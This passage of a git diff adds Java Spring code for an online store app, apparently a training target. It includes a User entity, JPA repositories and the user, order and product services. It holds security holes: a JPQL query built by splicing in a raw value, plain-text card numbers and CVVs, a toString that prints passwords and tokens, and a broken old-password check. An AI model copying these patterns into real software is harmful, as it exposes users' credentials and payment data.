+    
+    @Column(name = "password", nullable = false)
+    private String password;
+
+    @NotBlank(message = "address cannot be null")
+    @Column(name = "address", nullable = false)
+    private String address;
+
+    @Column(name = "resetPasswordToken")
+    private String resetPasswordToken;
+    
+    @Embedded
+    @AttributeOverrides(value = {
+        @AttributeOverride(name = "card", column = @Column(name = "card")),
+        @AttributeOverride(name = "cvv", column = @Column(name = "CVV")),
+        @AttributeOverride(name = "expirationMonth", column = @Column(name = "expirationMonth")),
+        @AttributeOverride(name = "expirationYear", column = @Column(name = "expirationYear"))
+    })
+    private CreditCard card;
+    
+    @Column(name = "image")
+    private String image;
+    
+    @OneToMany(mappedBy = "user")
+    private List<Comment> comments = new ArrayList<>();
+    
+    public Long getUserId() {
+        return userId;
+    }
+
+    public void setUserId(Long userId) {
+        this.userId = userId;
+    }
+
+    public String getName() {
+        return name;
+    }
+
+    public void setName(String name) {
+        this.name = name;
+    }
+
+    public String getEmail() {
+        return email;
+    }
+
+    public void setEmail(String email) {
+        this.email = email;
+    }
+
+    public String getPassword() {
+        return password;
+    }
+
+    public void setPassword(String password) {
+        this.password = password;
+    }
+
+    public String getAddress() {
+        return address;
+    }
+
+    public void setAddress(String address) {
+        this.address = address;
+    }
+
+    public String getImage() {
+        return image;
+    }
+
+    public void setImage(String image) {
+        this.image = image;
+    }
+
+    public CreditCard getCard() {
+        return card;
+    }
+
+    public void setCard(CreditCard card) {
+        this.card = card;
+    }
+
+    public List<Comment> getComments() {
+        return comments;
+    }
+
+    public void setComments(List<Comment> comments) {
+        this.comments = comments;
+    }
+
+    public String getResetPasswordToken() {
+        return resetPasswordToken;
+    }
+
+    public void setResetPasswordToken(String resetPasswordToken) {
+        this.resetPasswordToken = resetPasswordToken;
+    }
+
+    @Override
+    public String toString() {
+        return String.format("User{userId=%s, name=%s, email=%s, password=%s, address=%s, resetPasswordToken=%s, card=%s, image=%s}", 
+            userId, name, email, password, address, resetPasswordToken, card, image);
+    }
+
+}
diff --git a/src/main/java/es/storeapp/business/exceptions/AuthenticationException.java b/src/main/java/es/storeapp/business/exceptions/AuthenticationException.java
new file mode 100644
index 0000000..9098150
--- /dev/null
+++ b/src/main/java/es/storeapp/business/exceptions/AuthenticationException.java
@@ -0,0 +1,11 @@
+package es.storeapp.business.exceptions;
+
+public class AuthenticationException extends Exception {
+    
+    private static final long serialVersionUID = 9047626511480506926L;
+
+    public AuthenticationException(String message) {
+        super(message);
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/business/exceptions/DuplicatedResourceException.java b/src/main/java/es/storeapp/business/exceptions/DuplicatedResourceException.java
new file mode 100644
index 0000000..68449ad
--- /dev/null
+++ b/src/main/java/es/storeapp/business/exceptions/DuplicatedResourceException.java
@@ -0,0 +1,24 @@
+package es.storeapp.business.exceptions;
+
+public class DuplicatedResourceException extends Exception {
+    
+    private static final long serialVersionUID = 6896927410877749980L;
+
+    private final String resource;
+    private final String value;
+
+    public DuplicatedResourceException(String resource, String value, String message) {
+        super(message);
+        this.resource = resource;
+        this.value = value;
+    }
+
+    public Object getResource() {
+        return resource;
+    }
+
+    public Object getValue() {
+        return value;
+    }
+         
+}
diff --git a/src/main/java/es/storeapp/business/exceptions/InputValidationException.java b/src/main/java/es/storeapp/business/exceptions/InputValidationException.java
new file mode 100644
index 0000000..6af248a
--- /dev/null
+++ b/src/main/java/es/storeapp/business/exceptions/InputValidationException.java
@@ -0,0 +1,11 @@
+package es.storeapp.business.exceptions;
+
+public class InputValidationException extends Exception {
+
+    private static final long serialVersionUID = -6476895393943904784L;
+
+    public InputValidationException(String message) {
+        super(message);
+    }    
+    
+}
diff --git a/src/main/java/es/storeapp/business/exceptions/InstanceNotFoundException.java b/src/main/java/es/storeapp/business/exceptions/InstanceNotFoundException.java
new file mode 100644
index 0000000..dee462c
--- /dev/null
+++ b/src/main/java/es/storeapp/business/exceptions/InstanceNotFoundException.java
@@ -0,0 +1,24 @@
+package es.storeapp.business.exceptions;
+
+public class InstanceNotFoundException extends Exception {
+
+    private static final long serialVersionUID = -4208426212843868046L;
+
+    private final Long id;
+    private final String type;
+
+    public InstanceNotFoundException(Long id, String type, String message) {
+        super(message);
+        this.id = id;
+        this.type = type;
+    }
+
+    public Object getId() {
+        return id;
+    }
+
+    public String getType() {
+        return type;
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/business/exceptions/InvalidStateException.java b/src/main/java/es/storeapp/business/exceptions/InvalidStateException.java
new file mode 100644
index 0000000..a9ccede
--- /dev/null
+++ b/src/main/java/es/storeapp/business/exceptions/InvalidStateException.java
@@ -0,0 +1,11 @@
+package es.storeapp.business.exceptions;
+
+public class InvalidStateException extends Exception {
+
+    private static final long serialVersionUID = 3026551774263871416L;
+
+    public InvalidStateException(String message) {
+        super(message);
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/business/exceptions/ServiceException.java b/src/main/java/es/storeapp/business/exceptions/ServiceException.java
new file mode 100644
index 0000000..f7fba9e
--- /dev/null
+++ b/src/main/java/es/storeapp/business/exceptions/ServiceException.java
@@ -0,0 +1,11 @@
+package es.storeapp.business.exceptions;
+
+public class ServiceException extends Exception {
+    
+    private static final long serialVersionUID = -5772226522820952867L;
+
+    public ServiceException(String message) {
+        super(message);
+    }
+        
+}
diff --git a/src/main/java/es/storeapp/business/repositories/AbstractRepository.java b/src/main/java/es/storeapp/business/repositories/AbstractRepository.java
new file mode 100644
index 0000000..76a6b5c
--- /dev/null
+++ b/src/main/java/es/storeapp/business/repositories/AbstractRepository.java
@@ -0,0 +1,85 @@
+package es.storeapp.business.repositories;
+
+import es.storeapp.business.exceptions.InstanceNotFoundException;
+import es.storeapp.business.utils.ExceptionGenerationUtils;
+import es.storeapp.common.Constants;
+import java.text.MessageFormat;
+import java.util.List;
+import jakarta.persistence.EntityManager;
+import jakarta.persistence.NoResultException;
+import jakarta.persistence.PersistenceContext;
+import jakarta.persistence.Query;
+import es.storeapp.common.EscapingLoggerWrapper;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.core.GenericTypeResolver;
+
+public abstract class AbstractRepository<T> {
+
+    protected final EscapingLoggerWrapper logger;
+    
+    private static final String FIND_ALL_QUERY = "SELECT t FROM {0} t";
+    private static final String FIND_ALL_ORDERED_QUERY = "SELECT t FROM {0} t ORDER BY t.{1}";
+    private static final String FIND_BY_TEXT_ATTRIBUTE_QUERY = "SELECT t FROM {0} t WHERE t.{1} = ''{2}'' ORDER BY t.{3}";
+    
+    private final Class<T> genericType;
+
+    @PersistenceContext
+    protected EntityManager entityManager;
+
+    @Autowired
+    ExceptionGenerationUtils exceptionGenerationUtils;
+    
+    public AbstractRepository() {
+        this.genericType = (Class<T>) GenericTypeResolver.resolveTypeArgument(getClass(), AbstractRepository.class);
+        this.logger = new EscapingLoggerWrapper(this.genericType);
+    }
+
+    public T create(T entity) {
+        entityManager.persist(entity);
+        return entity;
+    }
+
+    public T update(T entity) {
+        entityManager.merge(entity);
+        return entity;
+    }
+    
+    public void remove(T entity) {
+        entityManager.remove(entity);
+    }
+
+    public T findById(Long id) throws InstanceNotFoundException {
+        try{
+            T t = entityManager.find(genericType, id);
+            if(t == null) {
+                throw new NoResultException(Long.toString(id));
+            }
+            return t;
+        } catch(NoResultException e) {
+            logger.error(e.getMessage(), e);
+            throw exceptionGenerationUtils.toInstanceNotFoundException(id, genericType.getSimpleName(), 
+                    Constants.INSTANCE_NOT_FOUND_MESSAGE);
+        }
+    }
+    
+    @SuppressWarnings("unchecked")
+    public List<T> findAll() {
+        Query query = entityManager.createQuery(MessageFormat.format(FIND_ALL_QUERY, 
+                genericType.getSimpleName()));
+        return (List<T>) query.getResultList();
+    }
+    
+    @SuppressWarnings("unchecked")
+    public List<T> findAll(String orderColumn) {
+        Query query = entityManager.createQuery(MessageFormat.format(FIND_ALL_ORDERED_QUERY, 
+                genericType.getSimpleName(), orderColumn));
+        return (List<T>) query.getResultList();
+    }
+    
+    @SuppressWarnings("unchecked")
+    public List<T> findByStringAttribute(String attribute, String value, String orderColumn) {
+        Query query = entityManager.createQuery(MessageFormat.format(FIND_BY_TEXT_ATTRIBUTE_QUERY, 
+                genericType.getSimpleName(), attribute, value, orderColumn));
+        return (List<T>) query.getResultList();
+    }
+}
diff --git a/src/main/java/es/storeapp/business/repositories/CategoryRepository.java b/src/main/java/es/storeapp/business/repositories/CategoryRepository.java
new file mode 100644
index 0000000..880268b
--- /dev/null
+++ b/src/main/java/es/storeapp/business/repositories/CategoryRepository.java
@@ -0,0 +1,19 @@
+package es.storeapp.business.repositories;
+
+import es.storeapp.business.entities.Category;
+import java.util.List;
+import jakarta.persistence.Query;
+import org.springframework.stereotype.Repository;
+
+@Repository
+public class CategoryRepository extends AbstractRepository<Category> {
+
+    private static final String FIND_HIGHLIGHTED_QUERY = "SELECT c FROM Category c WHERE c.highlighted = true";
+
+    @SuppressWarnings("unchecked")
+    public List<Category> findHighlighted() {
+        Query query = entityManager.createQuery(FIND_HIGHLIGHTED_QUERY);
+        return (List<Category>) query.getResultList();
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/business/repositories/CommentRepository.java b/src/main/java/es/storeapp/business/repositories/CommentRepository.java
new file mode 100644
index 0000000..6754caf
--- /dev/null
+++ b/src/main/java/es/storeapp/business/repositories/CommentRepository.java
@@ -0,0 +1,30 @@
+package es.storeapp.business.repositories;
+
+import es.storeapp.business.entities.Comment;
+import jakarta.persistence.Query;
+import org.springframework.stereotype.Repository;
+
+@Repository
+public class CommentRepository extends AbstractRepository<Comment>{
+
+    private static final String COUNT_BY_USER_AND_PRODUCT_QUERY = 
+        "SELECT COUNT(*) FROM Comment c WHERE c.user.id = ?1 and c.product.id = ?2";
+    
+    private static final String FIND_BY_USER_AND_PRODUCT_QUERY = 
+        "SELECT c FROM Comment c WHERE c.user.id = ?1 and c.product.id = ?2";
+    
+    public Integer countByUserAndProduct(Long userId, Long productId) {
+        Query query = entityManager.createQuery(COUNT_BY_USER_AND_PRODUCT_QUERY);
+        query.setParameter(1,userId);
+        query.setParameter(2,productId);
+        return (Integer) query.getSingleResult();
+    }
+    
+    public Comment findByUserAndProduct(Long userId, Long productId) {
+        Query query = entityManager.createQuery(FIND_BY_USER_AND_PRODUCT_QUERY);
+        query.setParameter(1,userId);
+        query.setParameter(2,productId);
+        return (Comment) query.getSingleResult();
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/business/repositories/OrderLineRepository.java b/src/main/java/es/storeapp/business/repositories/OrderLineRepository.java
new file mode 100644
index 0000000..e3702e5
--- /dev/null
+++ b/src/main/java/es/storeapp/business/repositories/OrderLineRepository.java
@@ -0,0 +1,22 @@
+package es.storeapp.business.repositories;
+
+import es.storeapp.business.entities.*;
+import jakarta.persistence.Query;
+import org.springframework.stereotype.Repository;
+
+@Repository
+public class OrderLineRepository extends AbstractRepository<OrderLine>{
+
+    private static final String FIND_BY_USER_AND_PRODUCT_QUERY = 
+            "SELECT COUNT(*) FROM OrderLine o WHERE " +
+            "o.order.state = es.storeapp.business.entities.OrderState.COMPLETED " + 
+            "AND o.order.user.id = ?1 AND o.product.id = ?2";
+
+    public boolean findIfUserBuyProduct(Long userId, Long productId) {
+        Query query = entityManager.createQuery(FIND_BY_USER_AND_PRODUCT_QUERY);
+        query.setParameter(1,userId);
+        query.setParameter(2,productId);
+        return ((Long) query.getSingleResult()) > 0;
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/business/repositories/OrderRepository.java b/src/main/java/es/storeapp/business/repositories/OrderRepository.java
new file mode 100644
index 0000000..402614b
--- /dev/null
+++ b/src/main/java/es/storeapp/business/repositories/OrderRepository.java
@@ -0,0 +1,20 @@
+package es.storeapp.business.repositories;
+
+import es.storeapp.business.entities.Order;
+import java.util.List;
+import jakarta.persistence.Query;
+import org.springframework.stereotype.Repository;
+
+@Repository
+public class OrderRepository extends AbstractRepository<Order> {
+    private static final String FIND_BY_USER_QUERY = 
+            "SELECT o FROM Order o WHERE o.user.id = ?1 ORDER BY o.timestamp DESC";
+        
+    @SuppressWarnings("unchecked")
+    public List<Order> findByUserId(Long userId) {
+        Query query = entityManager.createQuery(FIND_BY_USER_QUERY);
+        query.setParameter(1,userId);
+        return (List<Order>) query.getResultList();
+    }
+   
+}
diff --git a/src/main/java/es/storeapp/business/repositories/ProductRepository.java b/src/main/java/es/storeapp/business/repositories/ProductRepository.java
new file mode 100644
index 0000000..019f529
--- /dev/null
+++ b/src/main/java/es/storeapp/business/repositories/ProductRepository.java
@@ -0,0 +1,23 @@
+package es.storeapp.business.repositories;
+
+import es.storeapp.business.entities.Product;
+
+import java.text.MessageFormat;
+import java.util.List;
+import jakarta.persistence.Query;
+import org.springframework.stereotype.Repository;
+
+@Repository
+public class ProductRepository extends AbstractRepository<Product> {
+    
+    private static final String FIND_BY_CATEGORY_QUERY = 
+            "SELECT p FROM Product p WHERE p.category.name = ?1 ORDER BY p.{0}";
+    
+    @SuppressWarnings("unchecked")
+    public List<Product> findByCategory(String category, String orderColumn) {
+        Query query = entityManager.createQuery(MessageFormat.format(FIND_BY_CATEGORY_QUERY, orderColumn));
+        query.setParameter(1,category);
+        return (List<Product>) query.getResultList();
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/business/repositories/UserRepository.java b/src/main/java/es/storeapp/business/repositories/UserRepository.java
new file mode 100644
index 0000000..9dc5bbe
--- /dev/null
+++ b/src/main/java/es/storeapp/business/repositories/UserRepository.java
@@ -0,0 +1,43 @@
+package es.storeapp.business.repositories;
+
+import es.storeapp.business.entities.User;
+import jakarta.persistence.NoResultException;
+import jakarta.persistence.Query;
+import org.springframework.stereotype.Repository;
+
+@Repository
+public class UserRepository extends AbstractRepository<User> {
+    
+    private static final String FIND_USER_BY_EMAIL_QUERY = "SELECT u FROM User u WHERE u.email = ?1";
+    private static final String COUNT_USER_BY_EMAIL_QUERY = "SELECT COUNT(*) FROM User u WHERE u.email = ?1";
+    private static final String LOGIN_QUERY = "SELECT u FROM User u WHERE u.email = ?1 AND u.password = ?2";
+
+    public User findByEmail(String email) {
+        try {
+            Query query = entityManager.createQuery(FIND_USER_BY_EMAIL_QUERY);
+            query.setParameter(1,email);
+            return (User) query.getSingleResult();
+        } catch (NoResultException e) {
+            logger.error(e.getMessage(), e);
+            return null;
+        }
+    }
+
+    public boolean existsUser(String email) {
+        Query query = entityManager.createQuery(COUNT_USER_BY_EMAIL_QUERY);
+        query.setParameter(1,email);
+        return ((Long) query.getSingleResult() > 0);
+    }
+    
+    public User findByEmailAndPassword(String email, String password) {
+        try {
+            Query query = entityManager.createQuery(LOGIN_QUERY);
+            query.setParameter(1,email);
+            query.setParameter(2,password);
+            return (User) query.getSingleResult();
+        } catch (NoResultException e) {
+            logger.error(e.getMessage(), e);
+            return null;
+        }
+    }
+}
diff --git a/src/main/java/es/storeapp/business/services/OrderService.java b/src/main/java/es/storeapp/business/services/OrderService.java
new file mode 100644
index 0000000..862973e
--- /dev/null
+++ b/src/main/java/es/storeapp/business/services/OrderService.java
@@ -0,0 +1,126 @@
+package es.storeapp.business.services;
+
+import es.storeapp.business.entities.CreditCard;
+import es.storeapp.business.entities.Order;
+import es.storeapp.business.entities.OrderLine;
+import es.storeapp.business.entities.OrderState;
+import es.storeapp.business.entities.Product;
+import es.storeapp.business.entities.User;
+import es.storeapp.business.exceptions.InstanceNotFoundException;
+import es.storeapp.business.exceptions.InvalidStateException;
+import es.storeapp.business.repositories.OrderLineRepository;
+import es.storeapp.business.repositories.OrderRepository;
+import es.storeapp.business.repositories.ProductRepository;
+import es.storeapp.business.repositories.UserRepository;
+import es.storeapp.business.utils.ExceptionGenerationUtils;
+import es.storeapp.common.Constants;
+import java.text.MessageFormat;
+import java.util.List;
+import es.storeapp.common.EscapingLoggerWrapper;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.stereotype.Service;
+import org.springframework.transaction.annotation.Transactional;
+
+@Service
+public class OrderService {
+
+    private static final EscapingLoggerWrapper logger = new EscapingLoggerWrapper(OrderService.class);
+    
+    @Autowired
+    private OrderRepository orderRepository;
+    
+    @Autowired
+    private OrderLineRepository orderLineRepository;
+    
+    @Autowired
+    private ProductRepository productRepository;
+    
+    @Autowired
+    private UserRepository userRepository;
+    
+    @Autowired
+    ExceptionGenerationUtils exceptionGenerationUtils;
+    
+    @Transactional()
+    public Order create(User user, String name, String address, Integer price, List<Long> products) 
+            throws InstanceNotFoundException {
+        Order order = new Order();
+        order.setName(name);
+        order.setUser(user);
+        order.setAddress(address != null ? address : user.getAddress());
+        order.setPrice(price);
+        order.setState(OrderState.PENDING);
+        order.setTimestamp(System.currentTimeMillis());
+        orderRepository.create(order);
+        for (Long productId : products) {
+            Product product = productRepository.findById(productId);
+            product.setSales(product.getSales() + 1);
+            OrderLine orderLine = new OrderLine();
+            orderLine.setPrice(product.getPrice());
+            orderLine.setProduct(product);
+            orderLine.setOrder(order);  
+            orderLineRepository.create(orderLine);
+        }
+        return orderRepository.findById(order.getOrderId());
+    }
+    
+    @Transactional()
+    public Order pay(User user, Long orderId, String creditCart, Integer cvv, 
+                     Integer expirationMonth, Integer expirationYear, Boolean setAsDefault) 
+        throws InstanceNotFoundException, InvalidStateException {
+        Order order = orderRepository.findById(orderId);
+        if(order.getState() != OrderState.PENDING) {
+            if(logger.isWarnEnabled()) {
+                logger.warn(MessageFormat.format("Trying to pay the order {0}", order));
+            }
+            throw exceptionGenerationUtils.toInvalidStateException(Constants.INVALID_STATE_EXCEPTION_MESSAGE);
+        }
+        order.setState(OrderState.COMPLETED);
+        if(setAsDefault != null && setAsDefault) {
+            CreditCard card = new CreditCard();
+            card.setCard(creditCart);
+            card.setCvv(cvv);
+            card.setExpirationMonth(expirationMonth);
+            card.setExpirationYear(expirationYear);
+            user.setCard(card);
+            userRepository.update(user);
+        }
+        return orderRepository.update(order);
+    }
+    
+    @Transactional()
+    public Order cancel(User user, Long orderId) 
+        throws InstanceNotFoundException, InvalidStateException {
+        Order order = orderRepository.findById(orderId);
+        if(order.getState() != OrderState.PENDING) {
+            throw exceptionGenerationUtils.toInvalidStateException(Constants.INVALID_STATE_EXCEPTION_MESSAGE);
+        }
+        order.setState(OrderState.CANCELLED);
+        return orderRepository.update(order);
+    }
+    
+    @Transactional(readOnly = true)
+    public List<Order> findByUserById(Long userId) throws InstanceNotFoundException {
+        User user = userRepository.findById(userId);
+        if(logger.isDebugEnabled()) {
+            logger.debug(MessageFormat.format("Searching the orders of the user {0}", user.getEmail()));
+        }
+        return orderRepository.findByUserId(userId);
+    }
+
+    @Transactional(readOnly = true)
+    public Order findById(Long id) throws InstanceNotFoundException {
+        return orderRepository.findById(id);
+    }
+
+    @Transactional(readOnly = true)
+    public boolean findIfUserBuyProduct(Long userId, Long productId) throws InstanceNotFoundException {
+        User user = userRepository.findById(userId);
+        if(logger.isDebugEnabled()) {
+            logger.debug(MessageFormat.format("Checking if user {0} buy the product {1}", 
+                user.getEmail(), productId));
+        }
+        return orderLineRepository.findIfUserBuyProduct(userId, productId);
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/business/services/ProductService.java b/src/main/java/es/storeapp/business/services/ProductService.java
new file mode 100644
index 0000000..97b4d25
--- /dev/null
+++ b/src/main/java/es/storeapp/business/services/ProductService.java
@@ -0,0 +1,120 @@
+package es.storeapp.business.services;
+
+import es.storeapp.business.entities.Category;
+import es.storeapp.business.entities.Comment;
+import es.storeapp.business.entities.Product;
+import es.storeapp.business.entities.User;
+import es.storeapp.business.exceptions.InstanceNotFoundException;
+import es.storeapp.business.repositories.CategoryRepository;
+import es.storeapp.business.repositories.CommentRepository;
+import es.storeapp.business.repositories.ProductRepository;
+import es.storeapp.business.utils.ExceptionGenerationUtils;
+import es.storeapp.common.ConfigurationParameters;
+import es.storeapp.common.Constants;
+import java.text.MessageFormat;
+import java.util.List;
+import es.storeapp.common.EscapingLoggerWrapper;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.dao.EmptyResultDataAccessException;
+import org.springframework.stereotype.Service;
+import org.springframework.transaction.annotation.Transactional;
+
+@Service
+public class ProductService {
+
+    private static final EscapingLoggerWrapper logger = new EscapingLoggerWrapper(ProductService.class);
+
+    @Autowired
+    ConfigurationParameters configurationParameters;
+
+    @Autowired
+    private ProductRepository productRepository;
+
+    @Autowired
+    private CategoryRepository categoryRepository;
+
+    @Autowired
+    private CommentRepository rateRepository;
+
+    @Autowired
+    ExceptionGenerationUtils exceptionGenerationUtils;
+    
+    @Transactional(readOnly = true)
+    public List<Product> findAllProducts() {
+        return productRepository.findAll(Constants.PRICE_FIELD);
+    }
+
+    @Transactional(readOnly = true)
+    public List<Product> findProducts(String category) {
+        if (category == null || category.length() == 0) {
+            return productRepository.findAll(Constants.PRICE_FIELD);
+        } else {
+            return productRepository.findByCategory(category, Constants.PRICE_FIELD);
+        }
+    }
+
+    @Transactional(readOnly = false)
+    public Product findProductById(Long id) throws InstanceNotFoundException {
+        return productRepository.findById(id);
+    }
+
+    @Transactional(readOnly = true)
+    public List<Category> findAllCategories() {
+        return categoryRepository.findAll();
+    }
+
+    @Transactional(readOnly = true)
+    public List<Category> findHighlightedCategories() {
+        return categoryRepository.findHighlighted();
+    }
+
+    @Transactional()
+    public Comment findCommentByUserAndProduct(User user, Long productId)
+            throws InstanceNotFoundException {
+        try {
+            Product product = productRepository.findById(productId);
+            if(logger.isDebugEnabled()) {
+                logger.debug(MessageFormat.format("Searching if the user {0} has commented the product {1}", 
+                    user.getEmail(), product.getName()));
+            }
+            return rateRepository.findByUserAndProduct(user.getUserId(), productId);
+        } catch (EmptyResultDataAccessException e) {
+            return null;
+        }
+    }
+
+    @Transactional()
+    public Comment comment(User user, Long productId, String text, Integer rating)
+            throws InstanceNotFoundException {
+        Product product = productRepository.findById(productId);
+        try {
+            Comment comment = rateRepository.findByUserAndProduct(user.getUserId(), product.getProductId());
+            if(logger.isDebugEnabled()) {
+                logger.debug(MessageFormat.format("{0} has modified his comment of the product {1}", 
+                    user.getName(), product.getName()));
+            }
+            product.setTotalScore(product.getTotalScore() - comment.getRating() + rating);
+            comment.setRating(rating);
+            comment.setText(text);
+            comment.setTimestamp(System.currentTimeMillis());
+            productRepository.update(product);
+            return rateRepository.update(comment);
+        } catch (EmptyResultDataAccessException e) {
+            if(logger.isDebugEnabled()) {
+                logger.debug(MessageFormat.format("{0} created a comment of the product {1}", 
+                    user.getName(), product.getName()));
+            }
+            Comment comment = new Comment();
+            comment.setUser(user);
+            comment.setProduct(product);
+            comment.setRating(rating);
+            comment.setText(text);
+            comment.setTimestamp(System.currentTimeMillis());
+            product.setTotalComments(product.getTotalComments() + 1);
+            product.setTotalScore(product.getTotalScore() + rating);
+            productRepository.update(product);
+            return rateRepository.create(comment);
+        }
+    }
+
+}
diff --git a/src/main/java/es/storeapp/business/services/UserService.java b/src/main/java/es/storeapp/business/services/UserService.java
new file mode 100644
index 0000000..8976de4
--- /dev/null
+++ b/src/main/java/es/storeapp/business/services/UserService.java
@@ -0,0 +1,244 @@
+package es.storeapp.business.services;
+
+import es.storeapp.business.entities.User;
+import es.storeapp.business.exceptions.AuthenticationException;
+import es.storeapp.business.exceptions.DuplicatedResourceException;
+import es.storeapp.business.exceptions.InstanceNotFoundException;
+import es.storeapp.business.exceptions.ServiceException;
+import es.storeapp.business.repositories.UserRepository;
+import es.storeapp.business.utils.ExceptionGenerationUtils;
+import es.storeapp.common.ConfigurationParameters;
+import es.storeapp.common.Constants;
+import java.io.ByteArrayInputStream;
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.nio.file.Files;
+import java.util.Locale;
+import java.util.Objects;
+import java.util.UUID;
+import jakarta.annotation.PostConstruct;
+import org.apache.commons.compress.utils.IOUtils;
+import org.apache.commons.mail.HtmlEmail;
+import org.mindrot.jbcrypt.BCrypt;
+import es.storeapp.common.EscapingLoggerWrapper;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.context.MessageSource;
+import org.springframework.stereotype.Service;
+import org.springframework.transaction.annotation.Transactional;
+
+@Service
+public class UserService {
+
+    private static final EscapingLoggerWrapper logger = new EscapingLoggerWrapper(UserService.class);
+
+    @Autowired
+    ConfigurationParameters configurationParameters;
+
+    @Autowired
+    private UserRepository userRepository;
+
+    @Autowired
+    private MessageSource messageSource;
+
+    @Autowired
+    ExceptionGenerationUtils exceptionGenerationUtils;
+
+    private File resourcesDir;
+
+    @PostConstruct
+    public void init() {
+        resourcesDir = new File(configurationParameters.getResources());
+    }
+
+    @Transactional(readOnly = true)
+    public User findByEmail(String email) {
+        return userRepository.findByEmail(email);
+    }
+
+    @Transactional(readOnly = true)
+    public User login(String email, String clearPassword) throws AuthenticationException {
+        if (!userRepository.existsUser(email)) {
+            throw exceptionGenerationUtils.toAuthenticationException(Constants.AUTH_INVALID_USER_MESSAGE, email);
+        }
+        User user = userRepository.findByEmail(email);
+        if (!BCrypt.checkpw(clearPassword, user.getPassword())) {
+            throw exceptionGenerationUtils.toAuthenticationException(Constants.AUTH_INVALID_PASSWORD_MESSAGE, email);
+        }
+        return user;
+    }
+
+    @Transactional()
+    public void sendResetPasswordEmail(String email, String url, Locale locale)
+            throws AuthenticationException, ServiceException {
+        User user = userRepository.findByEmail(email);
+        if (user == null) {
+            return;
+        }
+        String token = UUID.randomUUID().toString();
+
+        try {
+
+            System.setProperty("mail.smtp.ssl.protocols", "TLSv1.2");
+
+            HtmlEmail htmlEmail = new HtmlEmail();
+            htmlEmail.setHostName(configurationParameters.getMailHost());
+            htmlEmail.setSmtpPort(configurationParameters.getMailPort());
+            htmlEmail.setSslSmtpPort(Integer.toString(configurationParameters.getMailPort()));
+            htmlEmail.setAuthentication(configurationParameters.getMailUserName(),
+                    configurationParameters.getMailPassword());
+            htmlEmail.setSSLOnConnect(configurationParameters.getMailSslEnable() != null
+                    && configurationParameters.getMailSslEnable());
+            if (configurationParameters.getMailStartTlsEnable()) {
+                htmlEmail.setStartTLSEnabled(true);
+                htmlEmail.setStartTLSRequired(true);
+            }
+            htmlEmail.addTo(email, user.getName());
+            htmlEmail.setFrom(configurationParameters.getMailFrom());
+            htmlEmail.setSubject(messageSource.getMessage(Constants.MAIL_SUBJECT_MESSAGE,
+                    new Object[]{user.getName()}, locale));
+
+            String link = url + Constants.PARAMS
+                    + Constants.TOKEN_PARAM + Constants.PARAM_VALUE + token + Constants.NEW_PARAM_VALUE
+                    + Constants.EMAIL_PARAM + Constants.PARAM_VALUE + email;
+
+            htmlEmail.setHtmlMsg(messageSource.getMessage(Constants.MAIL_TEMPLATE_MESSAGE,
+                    new Object[]{user.getName(), link}, locale));
+
+            htmlEmail.setTextMsg(messageSource.getMessage(Constants.MAIL_HTML_NOT_SUPPORTED_MESSAGE,
+                    new Object[0], locale));
+
+            htmlEmail.send();
+        } catch (Exception ex) {
+            logger.error(ex.getMessage(), ex);
+            throw new ServiceException(ex.getMessage());
+        }
+
+        user.setResetPasswordToken(token);
+        userRepository.update(user);
+    }
+
+    @Transactional
+    public User create(String name, String email, String password, String address,
+            String image, byte[] imageContents) throws DuplicatedResourceException {
+        if (userRepository.findByEmail(email) != null) {
+            throw exceptionGenerationUtils.toDuplicatedResourceException(Constants.EMAIL_FIELD, email,
+                    Constants.DUPLICATED_INSTANCE_MESSAGE);
+        }
+        User user = userRepository.create(new User(name, email, BCrypt.hashpw(password, BCrypt.gensalt()), address, image));
+        saveProfileImage(user.getUserId(), image, imageContents);
+        return user;
+    }
+
+    @Transactional
+    public User update(Long id, String name, String email, String address, String image, byte[] imageContents)
+            throws DuplicatedResourceException, InstanceNotFoundException, ServiceException {
+        User user = userRepository.findById(id);
+        User emailUser = userRepository.findByEmail(email);
+        if (emailUser != null && !Objects.equals(emailUser.getUserId(), user.getUserId())) {
+            throw exceptionGenerationUtils.toDuplicatedResourceException(Constants.EMAIL_FIELD, email,
+                    Constants.DUPLICATED_INSTANCE_MESSAGE);
+        }
+        user.setName(name);
+        user.setEmail(email);
+        user.setAddress(address);
+        if (image != null && image.trim().length() > 0 && imageContents != null) {
+            try {
+                deleteProfileImage(id, user.getImage());
+            } catch (Exception ex) {
+                logger.error(ex.getMessage(), ex);
+            }
+            saveProfileImage(id, image, imageContents);
+            user.setImage(image);
+        }
+        return userRepository.update(user);
+    }
+
+    @Transactional
+    public User changePassword(Long id, String oldPassword, String password)
+            throws InstanceNotFoundException, AuthenticationException {
+        User user = userRepository.findById(id);
+        if (user == null) {
+            throw exceptionGenerationUtils.toAuthenticationException(
+                    Constants.AUTH_INVALID_USER_MESSAGE, id.toString());
+        }
+        if (userRepository.findByEmailAndPassword(user.getEmail(), BCrypt.hashpw(oldPassword, BCrypt.gensalt())) == null) {
+            throw exceptionGenerationUtils.toAuthenticationException(Constants.AUTH_INVALID_PASSWORD_MESSAGE,
+                    id.toString());
+        }
+        user.setPassword(BCrypt.hashpw(password, BCrypt.gensalt()));
+        return userRepository.update(user);
+    }
+
+    @Transactional
+    public User changePassword(String email, String password, String token) throws AuthenticationException {
+        User user = userRepository.findByEmail(email);
+        if (user == null) {
+            throw exceptionGenerationUtils.toAuthenticationException(Constants.AUTH_INVALID_USER_MESSAGE, email);
+        }
+        if (user.getResetPasswordToken() == null || !user.getResetPasswordToken().equals(token)) {
+            throw exceptionGenerationUtils.toAuthenticationException(Constants.AUTH_INVALID_TOKEN_MESSAGE, email);
+        }
+        user.setPassword(BCrypt.hashpw(password, BCrypt.gensalt()));
+        user.setResetPasswordToken(null);
+        return userRepository.update(user);
+    }
+
+    @Transactional
+    public User removeImage(Long id) throws InstanceNotFoundException, ServiceException {
+        User user = userRepository.findById(id);
+        try {
+            deleteProfileImage(id, user.getImage());
+        } catch (IOException ex) {
